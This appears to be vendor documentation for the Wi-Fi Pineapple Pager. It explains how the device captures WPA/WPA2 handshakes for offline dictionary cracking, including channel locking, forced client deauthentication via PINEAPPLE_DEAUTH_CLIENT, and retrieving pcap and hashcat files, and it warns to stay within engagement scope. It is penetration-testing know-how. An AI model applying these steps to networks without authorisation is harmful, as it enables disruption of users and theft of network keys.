Handshake Collection
Wi-Fi networks using the WPA-PSK and WPA2-PSK suites are vulnerable to an offline dictionary attack against the secret key.
An offline attack means the attacker has collected all the information needed to attempt to attack the network key, and can do so at leisure.
Offline attacks are typically performed on a computer with a GPU to accelerate calculations, and with password lists of hundreds of thousands or millions of attempts.
WPA Handshakes
Rather than simply using the same encryption key for all clients, when a device joins a WPA-PSK or WPA2-PSK network, it performs a special packet exchange - dubbed a handshake - to establish a temporary key which the client uses.
By collecting this handshake, it is possible to attempt to recreate the secret data by trying thousands (or millions) of passwords. When the secret matches, you now know the original pre-shared key (PSK).
Handshakes are generated when a client connects to a network and when a client session is refreshed (by default, each client refreshes the temporary encryption data every 300 seconds, or 5 minutes.)
Collecting handshakes
Collecting a handshake requires several things:
- A client actively connecting to a WPA-PSK or WPA2-PSK network. Handshakes are only generated when a client is connecting.
- The Wi-Fi Pineapple Pager must be on the correct channel at this moment. During normal recon mode the Pager rapidly changes channels to build a view of the Wi-Fi environment.
- Critical portions of the handshake must be captured. A handshake consists of 4 specific packets; to successfully attack a handshake specific packets are required.
Handshake capture can sometimes be difficult for all these reasons, and the fact that handshakes are transmitted as data packets. While beacon packets (network advertisements) are management packets which are typically sent at lower transmission speeds, data packets are subject to automatic speed scaling.
Based on the capabilities of the client and access point, and the signal quality of the connection, data packets can be sent at variable speeds. The higher the capabilities and connection quality, the faster the data rate used for clients.
As the data rate of the packets increases, it becomes more difficult to passively capture a packet. Higher speeds are transmitted with more complex encodings, and on multiple antenna systems, they are transmitted with radio modes which can make capture very challening. The Pineapple recon engine is designed to maximize the chances of capturing a handshake, including setting channel configuration to capture the most data encoding types possible, and pausing channel hopping the instant the first packet in a handshake is seen.
It may be necessary to monitor for a long period of time (even up to hours, in a completely passive environment) to capture a full handshake - this is a normal part of how Wi-Fi operates.
Maximizing handshake collection
To maximize handshake collection, the Pager can be set to a specific channel. This can be done using the DuckyScript commands PINEAPPLE_EXAMINE_CHANNEL and PINEAPPLE_EXAMINE_BSSID to stop channel hopping and pause on a single channel, or to automatically find the channel of a known access point and pause hopping, respectively.
These commands can be run from a ssh session or the terminal in the Virtual Pager, or activated by user or recon payloads.
When locked to a channel, the Pager has the maximum chance of collecting handshakes, but will not be able to monitor devices or access points on other channels.
Handshake collection can be combined with client deauthentication to increase the chances of capture - whenever a client joins a network it performs a handshake, so by forcing clients to reconnect, new handshakes may be generated. The Pineapple client disconnection feature can be triggred from the command line or a payload using the PINEAPPLE_DEAUTH_CLIENT command.
Be sure to only trigger client deauthentication against networks that are in the scope of your engagement!
Deauthenticating clients from networks which aren’t yours and which you haven’t been given permission to test isn’t only a jerk move, it may be illegal in some jurisdictions. Know the laws of your region!
Return to normal recon mode with PINEAPPLE_EXAMINE_RESET.
Downloading Handshakes
Captured handshakes are stored in /root/loot/handshakes/. Handshake files are stored in the original pcap format and the Hashcat hcappx format.
You can download handshakes from your Pager using scp or sftp, or by downloading loot via the Virtual Pager.